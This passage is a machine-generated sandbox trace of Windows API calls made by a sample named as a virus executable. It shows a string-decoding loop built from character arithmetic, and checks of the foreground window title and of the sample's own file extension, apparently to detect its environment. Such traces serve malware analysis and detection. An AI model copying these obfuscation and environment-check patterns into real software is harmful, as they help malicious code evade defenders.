lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.153] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0175.154] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.154] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.154] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.155] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0175.155] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.156] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0175.156] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.156] GetForegroundWindow () returned 0x10162 [0175.157] GetLastError () returned 0x0 [0175.162] SysStringLen (param_1=" ") returned 0xff [0175.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0175.162] SysStringLen (param_1=" ") returned 0xff [0175.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0175.162] GetWindowTextA (in: hWnd=0x10162, lpString=0x11644c4, nMaxCount=255 | out: lpString="Blank Page - Windows Internet Explorer") returned 38 [0175.162] GetLastError () returned 0x0 [0175.163] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0175.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0175.163] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0175.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 256 [0175.163] SysStringLen (param_1="Bl") returned 0x2 [0175.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Bl", cchWideChar=3, lpMultiByteStr=0x11684fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bl", lpUsedDefaultChar=0x0) returned 3 [0175.163] SetWindowTextA (hWnd=0x103c4, lpString="Bl") returned 1 [0175.164] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0175.164] GetFocus () returned 0x0 [0175.164] lstrlenA (lpString="Bl") returned 2 [0175.164] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11684fc) returned 0x1 [0175.164] IsWindow (hWnd=0x103c4) returned 1 [0175.164] IsWindow (hWnd=0x103c4) returned 1 [0175.165] IsWindow (hWnd=0x103c4) returned 1 [0175.165] IsWindow (hWnd=0x103c4) returned 1 [0175.165] GetFocus () returned 0x0 [0175.166] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0175.166] GetFocus () returned 0x0 [0175.166] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0175.166] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0175.166] GetFocus () returned 0x0 [0175.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Bl", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0175.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Bl", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=3 | out: lpWideCharStr="Bl") returned 3 [0175.166] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0175.167] VarBstrCmp (bstrLeft="Bl", bstrRight="Sc", lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.167] SetTimer (hWnd=0x103bc, nIDEvent=0x103bc, uElapse=0x64, lpTimerFunc=0x0) returned 0x103bc [0175.167] PeekMessageA (in: lpMsg=0x28f564, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f564) returned 1 [0175.167] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x0, lParam=0x28f4cc) returned 0x0 [0175.167] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 1 [0175.168] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28f54c) returned 0x0 [0175.168] TranslateMessage (lpMsg=0x28f5e8) returned 0 [0175.168] DispatchMessageA (lpMsg=0x28f5e8) returned 0x1 [0175.168] GetExitCodeThread (in: hThread=0x124, lpExitCode=0x28f4c0 | out: lpExitCode=0x28f4c0) returned 1 [0175.168] ResumeThread (hThread=0x124) returned 0x0 [0175.168] SetThreadPriority (hThread=0x124, nPriority=0) returned 1 [0175.168] PeekMessageA (in: lpMsg=0x28f564, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f564) returned 0 [0175.169] GetTickCount () returned 0x1d188dd [0175.169] CoFreeUnusedLibraries () [0175.178] GetTickCount () returned 0x1d188ed [0175.179] IsWindowVisible (hWnd=0x103b8) returned 0 [0175.179] Sleep (dwMilliseconds=0x0) [0175.351] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf2d694, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0175.351] FileSystemObject:IDispatch:Invoke (in: This=0xf2d694, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0175.353] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0175.353] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168d8c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168d8c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="exe", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0175.354] CharUpperBuffW (in: lpsz="exe", cchLength=0x4 | out: lpsz="EXE") returned 0x4 [0175.354] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.354] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 1 [0175.354] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28f54c) returned 0x0 [0175.354] IsWindow (hWnd=0x103bc) returned 1 [0175.355] GetWindowLongA (hWnd=0x103bc, nIndex=-16) returned 1140916224 [0175.355] IsIconic (hWnd=0x103b8) returned 0 [0175.355] GetParent (hWnd=0x103bc) returned 0x103b8 [0175.355] TranslateMessage (lpMsg=0x28f5e8) returned 0 [0175.355] DispatchMessageA (lpMsg=0x28f5e8) returned 0x0 [0175.355] KillTimer (hWnd=0x103bc, uIDEvent=0x103bc) returned 1 [0175.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.356] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0175.356] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.357] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0175.357] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.358] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0175.358] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.359] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0175.359] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.365] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0175.366] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.366] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0175.367] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.367] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0175.368] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.368] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0175.368] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.369] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.369] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.370] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0175.370] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.371] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0175.371] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.372] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.372] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.373] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0175.373] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.374] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0175.374] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.375] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.427] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.428] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0175.428] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.429] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0175.429] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.430] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.430] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.431] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0175.431] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.432] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.432] 